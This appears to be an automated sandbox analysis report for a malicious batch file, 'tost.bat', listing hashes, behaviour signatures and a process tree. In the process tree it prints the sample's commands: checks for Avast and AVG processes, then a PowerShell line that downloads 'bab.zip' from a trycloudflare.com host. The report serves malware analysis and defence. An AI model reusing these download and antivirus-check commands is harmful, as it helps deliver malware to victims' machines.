Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-11-2024 17:20
Static task
static1
Behavioral task
behavioral1
Sample
tost.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
tost.bat
Resource
win10v2004-20241007-en
General
-
Target
tost.bat
-
Size
23KB
-
MD5
c26f41f48d02002dec3ad4e5156bfdda
-
SHA1
03abcb03be3d39da5e513f4f7056df179047eb2c
-
SHA256
5153a4d8ee131d9edb35829e1326f08c19d718c572a9274eacb7430896ec5112
-
SHA512
ed079f1e71aeaa49593c4dbdb3a916bc86daf5e0f2071772854e50d3e2d9690bc4957e4c65c09498bfa76aaa103aa99ab76fb893f2118e757ed8ecb4d1a3b3ba
-
SSDEEP
384:gTYcpQyuPmhDGEhtKCiFl8sutSjJ7RWGFX8qQt4TdKtyCHIbRJGE2fl08bcOB3wO:gTYcpQyuPmhDGEhtKC1snbWGWdIKZHIQ
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid Process 2880 powershell.exe 2676 powershell.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid Process 1684 tasklist.exe 2836 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 2880 powershell.exe 2676 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
tasklist.exetasklist.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1684 tasklist.exe Token: SeDebugPrivilege 2836 tasklist.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 2676 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 2344 wrote to memory of 1684 2344 cmd.exe 31 PID 2344 wrote to memory of 1684 2344 cmd.exe 31 PID 2344 wrote to memory of 1684 2344 cmd.exe 31 PID 2344 wrote to memory of 2656 2344 cmd.exe 32 PID 2344 wrote to memory of 2656 2344 cmd.exe 32 PID 2344 wrote to memory of 2656 2344 cmd.exe 32 PID 2344 wrote to memory of 2836 2344 cmd.exe 34 PID 2344 wrote to memory of 2836 2344 cmd.exe 34 PID 2344 wrote to memory of 2836 2344 cmd.exe 34 PID 2344 wrote to memory of 2840 2344 cmd.exe 35 PID 2344 wrote to memory of 2840 2344 cmd.exe 35 PID 2344 wrote to memory of 2840 2344 cmd.exe 35 PID 2344 wrote to memory of 2880 2344 cmd.exe 36 PID 2344 wrote to memory of 2880 2344 cmd.exe 36 PID 2344 wrote to memory of 2880 2344 cmd.exe 36 PID 2344 wrote to memory of 2676 2344 cmd.exe 37 PID 2344 wrote to memory of 2676 2344 cmd.exe 37 PID 2344 wrote to memory of 2676 2344 cmd.exe 37
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tost.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq AvastUI.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\system32\find.exefind /i "AvastUI.exe"2⤵PID:2656
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq avgui.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\system32\find.exefind /i "avgui.exe"2⤵PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://request-fr-geology-nobody.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://request-fr-geology-nobody.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5552bd9df2f9e79a2c064c11457a63b02
SHA15ed7d9241105e420b0fe66491852a84e8a99b893
SHA2566dc1d68300dfbbf901649dcc4b2b39e9d57d24ff27df21dfe73fd093a77f1c9a
SHA5121c6b08ffacd77f85a1d345833af98538e340ad661c6fcfaf4602b1fbabadebd83fe07bb2a0e920ebf39a9c71f9cc148ae9b887f8fda813f1224d00238b22ff21